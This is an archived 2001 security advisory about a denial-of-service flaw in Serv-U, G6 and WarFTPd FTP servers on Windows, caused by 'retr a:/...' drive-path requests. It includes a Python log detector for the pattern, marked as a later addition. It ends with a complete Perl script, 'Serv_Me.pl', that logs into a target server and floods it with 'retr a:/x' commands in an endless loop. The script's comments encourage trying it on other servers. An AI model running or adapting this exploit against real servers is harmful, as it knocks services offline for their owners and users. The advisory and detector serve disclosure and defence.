
Hexyn-sa-19.txt

Posted Apr 25, 2001
Authored by T-Omicron | Site t-omicr0n.hexyn.be

Securax / Hexyn Security Advisory #19 - FTP Server Denial Of Service tested on Serv-U FTP Server, G6 FTP Server and WarFTPd Server. The servers will freeze for about one second, and the CPU usage will go through the roof. Includes perl exploit.

tags | exploit, denial of service, perl
SHA-256 | 2d2c1f7da07480b818ba73c4939a20bb83cb1d28705c9d63c332c2c8acb5f5fe

Hexyn / Securax Advisory #19 - Multiple FTP Server DoS

Topic: Multiple FTP Server DoS
Announced: 2001-02-17
Affects: Serv-U FTP Server, G6 FTP Server, WarFTPd Server,...

DISCLAIMER:
***********
THE ENTIRE ADVISORY HAS BEEN BASED UPON TRIAL AND ERROR RESULTS.
THEREFORE WE CANNOT GUARANTEE THAT THE INFORMATION BELOW IS 100% CORRECT.
THIS DOCUMENT IS SUBJECT TO CHANGE WITHOUT PRIOR NOTICE.

THIS ADVISORY HAS ONLY BEEN TESTED ON WINDOWS 98 AND ONLY ON A SMALL
COLLECTION OF TEST SERVERS, SO THE OFFERED INFORMATION MAY NOT ALWAYS
BE CORRECT.

I. Problem Description
**********************
There is a DoS condition in most of the FTP servers available for
Windows 9x/NT. The bug is a consequence of the way Windows handles disk
drives.

II. Impact
**************
When sending the command "retr a:/blah" (or "get a:/blah" in the
default UNIX FTP client), the server will freeze for about one second,
and the CPU usage will go through the roof.

Exploit:
--------
Available at: http://t-Omicr0n.hexyn.be/exploits.htm

III. Solution
*************
At this time, no patch is available.
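
A defensive check for the request pattern in section II, added here as an example and not part of the original advisory or any vendor's code: it recognises path arguments that begin with a drive letter (such as "a:/blah") and flags clients that repeat them. The log format, the command set beyond RETR, and the threshold and window values are assumptions; the sample lines are constructed.

```python
import re
from collections import defaultdict

# Constructed sample log lines in a hypothetical format:
#   <epoch-seconds> <client-ip> <FTP command line>
SAMPLE_LOG = """\
982400000 192.0.2.10 USER anonymous
982400001 192.0.2.10 RETR a:/x
982400002 192.0.2.10 RETR a:/x
982400003 192.0.2.10 retr A:\\x
982400004 192.0.2.10 RETR a:/x
982400005 198.51.100.7 RETR pub/readme.txt
982400006 198.51.100.7 RETR /pub/a:notes.txt
982400090 203.0.113.5 RETR b:/setup.exe
"""

# A path argument that starts with a DOS drive letter, e.g. "a:/blah" or "A:\blah".
DRIVE_PATH = re.compile(r"^[A-Za-z]:([\\/]|$)")
# Commands that take a pathname; only RETR is named in the advisory, the rest are assumptions.
PATH_COMMANDS = {"RETR", "STOR", "SIZE", "CWD", "LIST", "NLST"}


def is_drive_path(arg: str) -> bool:
    """True when the argument addresses a drive directly instead of the FTP root."""
    return bool(DRIVE_PATH.match(arg.strip().strip('"')))


def flag_clients(log_text: str, threshold: int = 3, window: int = 10) -> dict:
    """Return {client: count} for clients sending >= threshold drive-letter
    path commands within any `window`-second span."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        parts = line.split(None, 3)
        if len(parts) < 4:
            continue  # command without an argument, or malformed line
        ts, client, verb, arg = parts
        if verb.upper() in PATH_COMMANDS and is_drive_path(arg):
            hits[client].append(int(ts))
    flagged = {}
    for client, times in hits.items():
        times.sort()
        # sliding window: most hits falling inside any `window` seconds
        best = max(sum(1 for t in times[i:] if t - times[i] < window)
                   for i in range(len(times)))
        if best >= threshold:
            flagged[client] = best
    return flagged
```

The same `is_drive_path` test can be applied by a server or proxy to refuse such arguments before the path reaches the filesystem.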

IV. Credits
***********
Bug discovered by t-Omicr0n <omicr0n@themail.com>

Greets to: f0bic, The Incubus, R00T-dude, cicer0, vorlon, sentinel,
oPr, Reggie, F_F, Shaolin_p, Segfau|t, NecrOmaN, Zym0t1c, l0r3,
Preat0r, T0SH, zeroX, AreS, tips, Lacrima, GigaByte and everyone
at #securax@irc.hexyn.be

-- t-Omicr0n @ http://t-Omicr0n.hexyn.be



#!/usr/bin/perl

#
# Serv_Me.pl - Remote FTP DoS'er
# ------------------------------
# "And in the end I will be free, by kissing you, or killing me."
# -- Mister Me.

# Tested on Serv-U FTP, G6 FTP and WarFTPd. Lots of other servers are vulnerable, just try.
# It DoSSeS by flooding the server with "retr a:/bla" commands.
# CPU usage during tests (in %): 2 2 3 13 100 100 100 100 ...

# Read "Hexyn / Securax Advisory #19 - Multiple FTP Server DoS" for more information
# @ http://t-Omicr0n.hexyn.be/advisories.htm

# I *hate* those flooding DoS'es, it's normal a server slows down when you flood the hell
# out of it, but this flood only sends 0.009 Kb/s and that's not even considered a flood,
# that's considered a drop of bytes every second.
# You can even DoS the server over a 1 KiloBit/s modem... :-)

# Greets to: f0bic, The Incubus, R00T-dude, cicer0, vorlon, sentinel, oPr, Reggie, F_F,
# Shaolin_p, Segfau|t, NecrOmaN, Zym0t1c, l0r3, Preat0r, T0SH, zeroX, AreS, tips,
# Lacrima, GigaByte and everyone at #securax@irc.hexyn.be

# WARNING: This *may* damage the server's floppy disk drive.

use IO::Socket;

sub initiate {
    if ($ARGV[0] eq '') {die "Usage: perl serv_me.pl <host> <port> <username> <password>\nExample: perl serv_me.pl 127.0.0.1 21 anonymous me@\n";}

    $host = $ARGV[0];
    $port = $ARGV[1];
    $user = $ARGV[2];
    $pass = $ARGV[3];
};

sub connecttoserver {
    print("Connecting to host: $host\n");
    $socket = IO::Socket::INET->new ( PeerAddr => $host,
                                      PeerPort => $port,
                                      Proto => "tcp",
                                      Type => SOCK_STREAM
                                    ) || die "Can't connect to $host";

    print "Socket Connected. Loggin in...\n";
};

sub login {
    print "user $user\n";
    print $socket "user $user\r\n";
    $response = <$socket>;
    print "$response\n";

    print "pass $pass\n";
    print $socket "pass $pass\r\n";
    $response = <$socket>;
    print "$response\n";

    print "Logged in. Dossing now. Press CTRL-C to stop.\n";
};

sub doit {
    for (;;){
        print "retr a:/x\n";
        print $socket "retr a:/x\r\n";
        $response = <$socket>;
        print "$response";
    }
}

initiate();
connecttoserver();
login();
doit();

# -- t-Omicr0n @ http://t-Omicr0n.hexyn.be